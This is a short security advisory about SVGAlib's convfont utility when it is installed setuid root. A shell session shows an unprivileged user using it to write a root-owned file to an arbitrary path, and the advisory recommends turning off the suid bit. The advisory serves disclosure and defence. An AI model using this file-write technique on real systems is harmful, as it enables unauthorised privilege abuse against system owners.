COMMAND

    convfont(1)

SYSTEMS AFFECTED

    Systems using SVGAlib with convfont suid root.

PROBLEM

    Suid convfont allows you to write to any file.

    $ echo >/tmp/file "Hello"
    $ ls -l /tmp/file
    -rw-------   1 looser  users      6 Mar  9 00:02 /tmp/file
    $ ls -l /usr/local/bin/convfont
    -rwsr-xr-x   1 root    root    2272 May 26 1994  /usr/local/bin/convfont*
    $ /usr/local/bin/convfont /tmp/file 6 /tmp/new-root-file
    Converting 1 characters
    Writing font file.
    $ ls -l /tmp/new-root-file
    -rw-------   1 root    users   8192 Mar  9 00:03 /tmp/new-root-file

    /tmp/new-root-file is "Hello" fallowed by a lot of space.

SOLUTION

    Turn suid bit off.